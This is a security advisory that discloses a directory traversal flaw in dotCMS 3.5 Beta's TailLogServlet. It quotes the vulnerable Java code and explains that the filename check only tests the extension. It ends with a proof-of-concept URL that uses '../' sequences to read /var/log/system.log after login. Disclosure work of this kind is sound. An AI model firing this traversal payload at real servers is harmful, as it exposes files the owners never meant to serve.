Advisory: DotCMS Directory traversal vulnerability Author: Piaox From Pingan Product Safety Group Email: xiongyaofu351@pingan.com.cn Affected Version: dotCMS 3.5 Beta(the latest version) ========================== Vulnerability Description Recetly, I found a Directory traversal vulnerability in ?DotCMS' program, DotCMS is widely used in many companies. Vulnerable file is: ?com.dotmarketing.servlets.taillog.TailLogServlet.class? File file = *null*; String tailLogLofFolder = *Config*.*getStringProperty*( "TAIL_LOG_LOG_FOLDER", "./dotsecure/logs/"); *try* { *if* (!tailLogLofFolder.endsWith(File.separator)) { tailLogLofFolder = tailLogLofFolder + File.separator; } file = *new* File(*FileUtil*.*getAbsolutlePath*(tailLogLofFolder + fileName)); } *catch* (Exception e) { *Logger*.*error*(getClass(), "unable to open log file '" + tailLogLofFolder + fileName + "' please set the config variable TAIL_LOG_LOG_FOLDER correctly"); } *if* ((file == *null*) || (!file.exists())) { response.sendError(403); *AdminLogger*.*log*(*TailLogServlet*.*class*, "service", "Someone tried to use the TailLogServlet to display a file not in the logs directory" ); *return*; } String regex = *Config*.*getStringProperty*("TAIL_LOG_FILE_REGEX"); //WEB-INF/classes/dotmarketing-config.properties:TAIL_LOG_FILE_REGEX=.*\.log$|.*\.out$ *if* (!*UtilMethods*.*isSet*(regex)) { regex = "!.*"; } *if* (!Pattern.compile(regex).matcher(fileName).matches()) { //Only detects whether the file extension .log end,lead ?caused Directory traversal vulnerability. *return*; } response.setContentType("text/html;charset=UTF-8"); ServletOutputStream out = response.getOutputStream(); out.print("<html><head><title>dotCMS Log</title><style type='text/css'>@import '/html/css/dot_admin.css';</style><script>var working =false;function doS(){if(!working){working=true;if(parent.document.getElementById('scrollMe').checked){dh=document.body.scrollHeight;ch=document.body.clientHeight;if(dh>ch){moveme=dh-ch;window.scrollTo(0,moveme);}}working=false;}}</script></head><body class='tailerBody'>"); out.flush(); *Tailer* tailer = *null*; *long* startPosition = file.length() - 5000L < 0L ? 0L : file.length() - 5000L; *MyTailerListener* listener = *new* MyTailerListener(*null*); listener.*handle*("Tailing " + fileName); listener.*handle*("----------------------------- "); tailer = *new* *Tailer*(file, listener, 1000L); tailer.*setStartPosition*(startPosition); *MyTailerThread* thread = *new* *MyTailerThread*(tailer); String name = *null*; *for* (*int* i = 0; i < 1000; i++) { name = "LogTailer" + i + ":" + fileName; Thread t = *ThreadUtils*.*getThread*(name); *if* (t == *null*) { *break*; } *if* (i > 100) { *throw* *new* ServletException("Too many Logger threads"); } } ========================== POC && EXP ========================== 1. Login 2. http://localhost:8080/dotTailLogServlet/?fileName=../../../../../../../../var/log/system.log